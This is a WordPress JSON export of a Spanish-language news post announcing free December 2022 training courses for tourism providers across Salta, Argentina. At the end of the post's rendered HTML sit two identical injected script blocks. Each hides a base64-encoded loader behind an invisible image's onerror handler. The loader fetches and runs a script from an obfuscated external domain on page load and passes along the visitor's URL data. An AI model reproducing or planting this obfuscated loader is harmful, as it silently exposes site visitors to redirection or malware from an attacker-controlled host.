{"id":1938,"date":"2022-12-13T13:05:47","date_gmt":"2022-12-13T16:05:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1938"},"modified":"2025-08-14T00:28:07","modified_gmt":"2025-08-14T03:28:07","slug":"en-diciembre-continuan-las-capacitaciones-gratuitas-para-prestadores-turisticos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1938","title":{"rendered":"En diciembre contin\u00faan las capacitaciones gratuitas para prestadores tur\u00edsticos"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#910729\"><em>Con el fin de contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad de los servicios, durante todo el mes tendr\u00e1n lugar actividades gratuitas de formaci\u00f3n en distintos puntos de la provincia. Los interesados deben inscribirse en www.turismotecapacita.com.<\/em><\/h4>\n\n\n\n<p>En el marco del Plan Integral de Capacitaci\u00f3n Tur\u00edstica hacia un destino sostenible del Ministerio de Turismo y Deportes se brindar\u00e1n capacitaciones gratuitas de formaci\u00f3n para prestadores tur\u00edsticos.<\/p>\n\n\n\n<p>Durante diciembre las capacitaciones se dictar\u00e1n en ciudad de Salta, La Vi\u00f1a, La Caldera, Guachipas, Tartagal, Aguaray, San Carlos, Rosario de la Frontera y Campo Quijano.<\/p>\n\n\n\n<p>Destinado a prestadores gastron\u00f3micos del Programa Sabores del Valle de Lerma y de los Valles Calchaqu\u00edes, el curso T\u00e9cnicas para el Desarrollo de una Cocina Local y Creativa. El Proceso Creativo Aplicado a los Productos se desarrollar\u00e1, de manera virtual, hasta hoy&nbsp;12 de diciembre, a cargo de Salamanca, Escuela de Gastronom\u00eda.<\/p>\n\n\n\n<p>En tanto, prestadores del sector tur\u00edstico podr\u00e1n participar del Desarrollo de Circuitos Innovadores de manera virtual el martes 13 en Guachipas, el mi\u00e9rcoles 14 en Tartagal y Aguaray, y el jueves 22 en Seclant\u00e1s. Asimismo se llevar\u00e1 adelante de manera presencial en La Caldera el lunes 12 de diciembre.<\/p>\n\n\n\n<p>Por otra parte en la localidad de San Carlos se dictar\u00e1 de manera presencial el curso Primeros Auxilios que estar\u00e1 a cargo del Dr. Rodolfo Pastore.<\/p>\n\n\n\n<p>Destinado al personal de contacto del Sector Hotelero de la localidad de Rosario de la Frontera se desarrollar\u00e1 el curso Recepci\u00f3n y Conserjer\u00eda B\u00e1sica, a cargo de la Tec. Mar\u00eda Elena Perdig\u00f3n, de manera presencial el d\u00eda 19 de diciembre de 10 a 18 &nbsp;en Rosario de la Frontera.<\/p>\n\n\n\n<p>Por otro lado, el martes 20 de diciembre se llevar\u00e1 adelante el cierre del programa El Poder de los Detalles que acompa\u00f1\u00f3 a los prestadores de manera personalizada para identificar sus problem\u00e1tica y colaborar en su resoluci\u00f3n desde la asistencia t\u00e9cnica.<\/p>\n\n\n\n<p>Los interesados en estas actividades deben inscribirse ingresando en\u00a0<a href=\"http:\/\/www.turismotecapacita.com\/\" target=\"_blank\" rel=\"noopener\">www.turismotecapacita.com<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-diciembre-continuan-las-capacitaciones-gratuitas-para-prestadores-turisticos-86706\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con el fin de contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad de los servicios, durante todo el mes tendr\u00e1n lugar actividades gratuitas de formaci\u00f3n en distintos puntos de la provincia. Los interesados deben inscribirse en www.turismotecapacita.com. En el marco del Plan Integral de Capacitaci\u00f3n Tur\u00edstica hacia un [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1939,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1938","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1938"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1938"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1938\/revisions"}],"predecessor-version":[{"id":7245,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1938\/revisions\/7245"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1939"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}